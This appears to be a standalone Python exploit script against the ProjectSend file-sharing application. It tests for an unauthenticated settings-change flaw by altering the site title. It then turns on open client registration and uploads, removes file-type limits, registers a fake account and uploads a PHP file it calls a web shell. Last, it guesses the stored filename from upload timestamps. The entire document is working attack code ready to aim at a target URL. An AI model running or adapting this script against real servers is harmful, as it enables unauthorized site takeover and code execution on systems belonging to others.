1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242
| import argparse import hashlib import html import logging import random import re import requests import string import sys import time import warnings from bs4 import BeautifulSoup from datetime import datetime, timedelta from faker import Faker from urllib.parse import urljoin
logging.basicConfig(level=logging.INFO, format="%(asctime)s %(message)s")
warnings.filterwarnings('ignore', message='Unverified HTTPS request')
class ProjectSendExploit: def __init__(self, target_url): self.target_url = target_url self.session = requests.Session() self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36' }) self.faker = Faker() self.csrf_token = None
def make_request(self, method, endpoint, **kwargs): url = urljoin(self.target_url, endpoint) kwargs.update({ 'timeout': 30, 'verify': False, 'allow_redirects': False, 'proxies': {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} }) try: response = self.session.request(method, url, **kwargs) return response except requests.exceptions.RequestException as e: logging.error(f"Request failed: {str(e)}") return None
def extract_csrf_token(self, response): soup = BeautifulSoup(response.text, 'html.parser') token = soup.find('input', {'name': 'csrf_token'}) if token: return token['value'] return None
def check(self): logging.info(f"[+] Starting vulnerability check against {self.target_url} ...") response = self.make_request('GET', 'index.php') if response is None or response.status_code != 200: logging.error("Target is not reachable") return False
logging.info("[-] Extracting CSRF token.") self.csrf_token = self.extract_csrf_token(response) if not self.csrf_token: logging.error("CSRF token not found") return False
logging.info("[-] Extracting website title.") title_regex = r"<title>.*?»\s+(.*?)</title>" match = re.search(title_regex, response.text) if not match: logging.error("Title not found or malformed response.") return False original_title = match.group(1)
logging.info("[-] Changing website title.") random_new_title = self.random_string(8) params = { 'csrf_token': self.csrf_token, 'section': 'general', 'this_install_title': random_new_title } self.make_request('POST', 'options.php', data=params)
response = self.make_request('GET', 'index.php') match = re.search(title_regex, response.text) if not match: logging.error("Title not found or malformed response.") return False updated_title = match.group(1)
if updated_title == random_new_title: logging.info("[!] Target is vulnerable, restoring the original title.") params['this_install_title'] = original_title self.make_request('POST', 'options.php', data=params) return True
return False
def enable_user_registration(self): logging.info("[+] Enabling user registration, auto-approval and allow upload...") params = { 'csrf_token': self.csrf_token, 'section': 'clients', 'clients_can_register': 1, 'clients_auto_approve': 1, 'clients_can_upload': 1, } self.make_request('POST', 'options.php', data=params) response = self.make_request('GET', 'index.php') if 'Register as a new client.' in response.text: logging.info("[!] User registration enabled.") else: logging.error("Failed to enable user registration.") return False
return True
def disable_upload_restrictions(self): logging.info("[+] Disabling upload restrictions...") params = { 'csrf_token': self.csrf_token, 'section': 'security', 'file_types_limit_to': 'noone' } self.make_request('POST', 'options.php', data=params)
def register_new_user(self): logging.info("[+] Registering new user...") username = self.faker.user_name() password = self.random_string(8) email = self.faker.email() address = self.random_string(8)
params = { 'csrf_token': self.csrf_token, 'name': username, 'username': username, 'password': password, 'email': email, 'address': address, } response = self.make_request("POST", "register.php", data=params) if response and response.status_code != 403: logging.info(f"[!] Successfully registered: {username}") return username, password logging.error("Failed to register new user.") return None, None
def login(self, username, password): logging.info(f"[+] Logging in as {username}...") params = { 'csrf_token': self.csrf_token, 'do': 'login', 'username': username, 'password': password, } response = self.make_request('POST', 'index.php', data=params) if response and (any(key.lower() == "set-cookie" for key in response.headers) or (response.status_code == 302 and '/my_files/index.php' in response.headers.get('Location', ''))): logging.info("[!] Login successful.") return True logging.error("Login failed.") return False
def upload_file(self): logging.info("[+] Uploading PHP shell file...") filename = self.random_string() + '.php' file_content = b"<?php echo 'Hello World';?>" files = { 'name': (None, filename), 'file': (filename, file_content, 'application/octet-stream'), }
response = self.make_request('POST', 'includes/upload.process.php', files=files) if response and response.status_code == 200 and 'OK' in response.text: logging.info(f"[!] Successfully uploaded file: {filename}") return response.headers.get('Date'), filename logging.error("File upload failed.") return None, None
def verify_shell(self, username, upload_time, filename): time.sleep(3) logging.info('[-] Verifying shell file...') potential_urls = self.calculate_potential_filenames(username, upload_time, filename) for url in potential_urls: response = self.make_request('GET', f'upload/files/{url}') if response and response.status_code == 200: logging.info(f"[!] WebShell Address: {urljoin(self.target_url, f'upload/files/{url}')}") return
def calculate_potential_filenames(self, username, upload_time, filename): hashed_username = hashlib.sha1(username.encode('utf-8')).hexdigest() base_time = datetime.strptime(upload_time, '%a, %d %b %Y %H:%M:%S GMT').replace(tzinfo=None) possible_filenames = [] for timezone in range(-12, 15): adj_time = base_time + timedelta(hours=timezone) possible_filenames.append(f"{int(adj_time.timestamp())}-{hashed_username}-{filename}") return possible_filenames
def random_string(self, length=8): return ''.join(random.choices(string.ascii_letters + string.digits, k=length))
def exploit(self): if not self.check(): logging.error("Exploit failed at check phase.") sys.exit(1)
if not self.enable_user_registration(): logging.error("Exploit failed at enabling registration.") sys.exit(1)
self.disable_upload_restrictions()
username, password = self.register_new_user() if username is None or password is None: sys.exit(1)
if not self.login(username, password): sys.exit(1)
upload_time, filename = self.upload_file() if not upload_time or not filename: sys.exit(1)
self.verify_shell(username, upload_time, filename)
def main(): parser = argparse.ArgumentParser() parser.add_argument("url", type=str, help="Target URL") args = parser.parse_args()
exploit = ProjectSendExploit(args.url) exploit.exploit()
if __name__ == "__main__": main()
|